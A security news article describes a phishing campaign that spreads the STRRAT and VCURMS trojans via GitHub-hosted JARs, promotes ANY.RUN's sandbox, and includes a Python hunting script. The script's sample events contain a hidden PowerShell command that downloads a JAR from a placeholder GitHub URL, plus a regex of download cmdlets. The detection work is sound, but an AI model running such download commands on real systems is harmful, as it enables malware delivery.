Hackers Deploy STRRAT & VCURMS Malware on Windows Via GitHub

A new phishing campaign targets users with emails containing a button to “verify payment information.” Clicking the button triggers the download of a malicious JAR file (disguised as an invoice) that leverages a PowerShell command to download two additional JARs. 

The JARs deploy the STRRAT and VCURMS RATs, giving attackers remote access, keylogging, and credential theft from browsers and applications such as Discord and Steam. VCURMS can additionally download further modules to extend its information-stealing functionality.

The attackers host the malware on AWS or GitHub, obfuscate the initial JAR file, and wrap it with a commercial protector to evade detection.

Finding the attack in ANY.RUN’s Threat Intelligence Lookup

The Threat Intelligence Lookup feature of ANY.RUN allows you to investigate suspicious campaigns.

ANY.RUN Threat Intelligence Lookup portal

By crafting a query that combines a detection rule name with a domain name (e.g., RuleName:"strrat" AND DomainName:"github.com"), analysts can identify sandbox sessions in which the suspicious behavior (STRRAT) was observed interacting with a particular domain (github.com).

A query to find IOCs and events connected to STRRAT malware

The lookup presents two key results: a table with interactive analysis sessions (left side) that can be used to examine malware behavior in a safe environment and a list of malicious executables (right side) downloadable for further analysis or to check logs for potential compromises.

To learn more about the sample's behavior and extract additional IOCs, we can replay a recording of an interactive analysis session; to follow along, open the session in your browser.

Analyzing the attack in ANY.RUN’s Sandbox

ANY.RUN is a cloud-based sandbox environment for analyzing suspicious files. It utilizes YARA and Suricata rules to detect malware within 40 seconds of uploading. 

Main view in the ANY.RUN interactive sandbox. Note the tags in the upper-right corner.

Analysts can then directly interact with the sandboxed environment to observe malware behavior and collect indicators of compromise (IOCs), empowering security teams to collaboratively investigate threats and efficiently respond to emerging and persistent attacks. 

The analysis begins with the tags in the ANY.RUN sandbox, which flag the presence of STRRAT malware.

The Connections tab is used to identify a connection from javaw.exe to GitHub, potentially linking the sample to a more extensive campaign.
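The two behaviors the article singles out (a Java process spawning a PowerShell downloader, and javaw.exe connecting to GitHub or AWS, as described in the attack chain above and in the Connections tab) can be turned into host-based hunting logic. The following is an added example and not ANY.RUN's code or a detection from the original article: it assumes endpoint telemetry already parsed into Sysmon-style dictionaries (field names such as `parent_image` and `dest_host` are assumptions), runs over a constructed sample of events, and correlates both rules on the same Java process to raise severity.

```python
"""Hunt for the STRRAT/VCURMS delivery chain in endpoint telemetry.

Added example (not ANY.RUN's code). Event records use assumed Sysmon-style
field names; the sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

JAVA_IMAGES = ("java.exe", "javaw.exe")
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# Hosting used by the campaign per the article (GitHub, AWS). Assumption:
# these domain suffixes cover the endpoints the loader contacts.
CODE_HOSTING_SUFFIXES = ("github.com", "githubusercontent.com", "amazonaws.com")
# Common PowerShell download primitives; extend for your environment.
DOWNLOAD_CMDLET = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|start-bitstransfer)",
    re.IGNORECASE,
)

# Constructed sample: ws01 shows the chain, ws02 is benign Java/PowerShell use.
SAMPLE_EVENTS = [
    {"event": "process_create", "host": "ws01", "pid": 4120, "parent_pid": 1600,
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"javaw.exe -jar C:\Users\bob\Downloads\Invoice.jar"},
    {"event": "process_create", "host": "ws01", "pid": 4188, "parent_pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://github.com/EXAMPLE/EXAMPLE/raw/main/a.jar -OutFile $env:TEMP\a.jar"'},
    {"event": "network_connect", "host": "ws01", "pid": 4120,
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "dest_host": "github.com", "dest_port": 443},
    {"event": "process_create", "host": "ws02", "pid": 900, "parent_pid": 1200,
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"javaw.exe -jar C:\Tools\ide.jar"},
    {"event": "network_connect", "host": "ws02", "pid": 900,
     "image": r"C:\Program Files\Java\jre\bin\javaw.exe",
     "dest_host": "repo.maven.apache.org", "dest_port": 443},
    {"event": "process_create", "host": "ws02", "pid": 950, "parent_pid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",  # admin use, not Java-spawned
     "cmdline": "powershell -c \"Invoke-WebRequest https://example.invalid/tool.zip\""},
]


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    pid: int      # PID of the Java process involved
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_java_spawns_downloader(ev: dict):
    """Java/javaw parent launching PowerShell with a download cmdlet."""
    if ev["event"] != "process_create":
        return None
    if basename(ev["parent_image"]) not in JAVA_IMAGES:
        return None
    if basename(ev["image"]) not in POWERSHELL_IMAGES:
        return None
    if not DOWNLOAD_CMDLET.search(ev["cmdline"]):
        return None
    return Finding(ev["host"], "java_spawns_powershell_downloader", ev["parent_pid"], ev["cmdline"])


def rule_java_to_code_hosting(ev: dict):
    """Java/javaw making an outbound connection to GitHub or AWS hosting."""
    if ev["event"] != "network_connect":
        return None
    if basename(ev["image"]) not in JAVA_IMAGES:
        return None
    host = ev["dest_host"].lower()
    # Suffix match on label boundaries so "notgithub.com" does not match.
    if not any(host == s or host.endswith("." + s) for s in CODE_HOSTING_SUFFIXES):
        return None
    return Finding(ev["host"], "java_connects_to_code_hosting", ev["pid"], f"{host}:{ev['dest_port']}")


RULES = (rule_java_spawns_downloader, rule_java_to_code_hosting)


def hunt(events) -> list:
    findings = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


def triage(findings) -> dict:
    """Group findings by (host, Java PID); both rules on one process = high."""
    by_proc = {}
    for f in findings:
        by_proc.setdefault((f.host, f.pid), set()).add(f.rule)
    return {k: ("high" if len(v) == len(RULES) else "medium") for k, v in by_proc.items()}


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
    print(triage(hunt(SAMPLE_EVENTS)))
```

Either rule on its own will fire on legitimate Java tooling (build systems fetch from GitHub constantly), which is why `triage` only escalates when the same Java process both spawns a downloader and reaches code hosting; tune the domain suffixes and cmdlet list to your environment.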

Indicators of Compromise

To collect IOCs, the analyst uses the dedicated IOC button within ANY.RUN, which provides the information security teams need to update their defenses and continue the investigation.

The session also shows ANY.RUN extracting the malware configuration, automatically decrypting embedded strings, and revealing details such as persistence mechanisms and Command & Control (C2) server locations, which saves analysts significant time and effort compared to manual reverse engineering.

Get a personalized demo of ANY.RUN for your team to see how it can benefit and contribute to your organization’s security – Schedule a call today.

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
